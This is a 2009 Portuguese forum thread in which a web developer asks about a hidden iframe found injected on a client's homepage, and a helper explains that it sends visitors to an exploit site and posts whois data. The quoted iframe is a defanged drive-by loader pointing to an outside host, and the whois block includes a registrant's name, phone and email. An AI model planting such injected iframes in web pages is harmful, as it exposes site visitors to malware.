Teteu 0 Denunciar post Postado Agosto 4, 2009 Olá pessoal, não sei se estou postando no tópico certo mas... Me deparei com o seguinte código em uma pagina index: <iframe src="hxxp://xe6.ru:8080/index.php" width=126 height=152 style="visibility: hidden"></iframe> Esse código tem sido barrado pelos buscadores, já que é reconhecido código malicioso, alguém tem informação sobre o que é? Compartilhar este post Link para o post Compartilhar em outros sites
Silas Martins 0 Denunciar post Postado Agosto 5, 2009 Olá esse código tem nele uma url que injeta na maquina um exploit, veja como funciona o esquema: Existe uma url presente no código postato por você que redireciona a pessoa para outro site infectado. AVISO Não execute nenhuma url listada aqui em seu navagedor Whois detailsDomain IP(s): Reverse: 91.121.89.185 ns27903.ovh.net 91.121.146.101 ks357228.kimsufi.XXX (AVISO: domínios com terminação retirada para que usuários não cliquem) 91.121.167.41 ks361128.kimsufi.XXX 79.170.89.217 netvibe.xlshosting.XXX Name servers: ns1.freeonlinednshost.com => 202.65.134.102 | 166 domains listed using this name server ns2.freeonlinednshost.com => 58.120.224.163 | 166 domains listed using this name server ns3.freeonlinednshost.com => 78.129.233.17 | 166 domains listed using this name server ns4.freeonlinednshost.com => 165.132.70.147 | 166 domains listed using this name server % By submitting a query to RIPN's Whois Service % you agree to abide by the following terms of use: % hxxp://www.ripn.net/about/servpol.html#3.2 (in Russian) % hxxp://www.ripn.net/about/en/servpol.html#3.2 (in English). domain: XE6.RU type: CORPORATE nserver: ns1.freeonlinednshost.com. nserver: ns2.freeonlinednshost.com. nserver: ns3.freeonlinednshost.com. nserver: ns4.freeonlinednshost.com. state: REGISTERED, DELEGATED person: Liliya T Ahmadullina phone: +7 3412 930011 e-mail: lili@co5.ru registrar: REGRU-REG-RIPN created: 2009.06.29 paid-till: 2010.06.29 source: TC-RIPN Additional information Redirections: Malicious sites is hosted on 1 domain including: ozdemirlerhirdavat.com Me diga qual o motivo de seu questionamento? Sua maquina esteve em contato com esse código? Aguardo seu retorno Compartilhar este post Link para o post Compartilhar em outros sites
Teteu 0 Denunciar post Postado Agosto 5, 2009 Trabalho com desenvolvimento de Web Sites e em um dos clientes, a pagina inicial ficou desconfigurada e aparecia esse código que postei acima, e logo depois foi barrado pelo Google. Como é a primeira vez que me deparo com isso queria saber mais informações e como proceder. Já que não sei se é só remover essa parte do código. Compartilhar este post Link para o post Compartilhar em outros sites
Silas Martins 0 Denunciar post Postado Agosto 5, 2009 Provavelmente seu cliente foi vitima de um defacer, verifique os arquivos de paginação e SQL Compartilhar este post Link para o post Compartilhar em outros sites
Teteu 0 Denunciar post Postado Agosto 5, 2009 Ok, já tinha efetuado tais ações. Muito obrigado pelas informações. Compartilhar este post Link para o post Compartilhar em outros sites
Silas Martins 0 Denunciar post Postado Agosto 5, 2009 Caso resolvido Compartilhar este post Link para o post Compartilhar em outros sites
Silas Martins 0 Denunciar post Postado Agosto 5, 2009 PROBLEMA RESOLVIDO! Caso o autor necessite que o tópico seja reaberto basta enviar uma Mensagem Privada para um Moderador com um link para o tópico. Compartilhar este post Link para o post Compartilhar em outros sites
